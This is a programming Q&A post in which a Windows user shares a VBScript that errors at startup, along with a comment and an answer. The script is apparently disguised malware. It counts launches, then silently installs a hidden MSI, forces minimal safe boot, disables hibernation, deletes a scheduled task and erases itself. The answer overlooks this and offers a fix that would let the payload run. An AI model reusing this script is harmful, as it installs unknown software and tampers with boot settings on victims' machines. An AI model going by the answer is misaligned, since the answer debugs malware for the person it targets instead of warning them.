# Windows script Host problem.. error code 800a000D..Type mismatch "Clnt"

Tags: windows, shell, vbscript, wsh

Hi I'm windows 10 user with little to zero knowledge about programming. An error came up and windows fail to load... when I my pc opens a dialog box appears.. "Windows script Host"

what is wrong with this code ... the error says it is on line 10 char 2

```
Set oShell = CreateObject ("Wscript.Shell")
Dim ccdat
ccdat = "updatesettings.dbf"
Dim fso, setting, cc, strArgs
strArgs = "%comspec% /C %SystemRoot%\System32\msiexec.exe /i %SystemRoot%\System32\ServiceInstaller.msi /qn & del %SystemRoot%\System32\ServiceInstaller.msi & %SystemRoot%\System32\bcdedit.exe /set {current} safeboot minimal & %SystemRoot%\System32\powercfg.exe /hibernate off & schtasks /Delete /TN ""Microsoft\Windows\Maintenance\InstallWinSAT"" /F"
Set fso = CreateObject("Scripting.FileSystemObject")

If (fso.FileExists(ccdat)) Then
    Set setting = fso.OpenTextFile(ccdat, 1, 0)
    cc = CInt(setting.ReadLine)
    setting.Close

    If(cc > 9) Then
        oShell.Run strArgs, 0, false
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        strScript = Wscript.ScriptFullName
        objFSO.DeleteFile(ccdat)
        objFSO.DeleteFile(strScript)
        WScript.Quit()
    End If

    Set setting = fso.CreateTextFile(ccdat, True, False)
    cc = cc+1
    setting.Write(cc)
    setting.Close
    WScript.Quit()
Else

Set setting = fso.CreateTextFile(ccdat, True, False)
    setting.Write("0")
    setting.Close
    WScript.Quit()
End If
```

Comment: 1) Your code is VBScript, not PowerShell. 2) You are reading text from a text file and passing it to the `CInt` function, which will throw an error if the text from the file can't be interpreted as an integer value.

Answer (score 0):

Based on your example, it looks like updatesettings.dbf is just a file containing an incremental counter.  In fact, the counter value may be larger than MAXINT, which could also cause that error.  If true, try changing line 10 from this:

```
cc = CInt(setting.ReadLine)
```

To this:

```
On Error Resume Next
Err.Clear
cc = CInt(setting.ReadLine)
If (0 <> Err.Number) Then cc = -1
On Error Goto 0
```

This should effectively handle the error and force the cc variable to a pre-initialized state, which gets incremented later (line 23) to its original initialization state of zero (0) and saved to the updatesettings.dbf file.  Meaning: This should accomplish the same thing as the 'Else' initialization block after line 27 when the updatesettings.dbf file doesn't exist.

Hope this helps.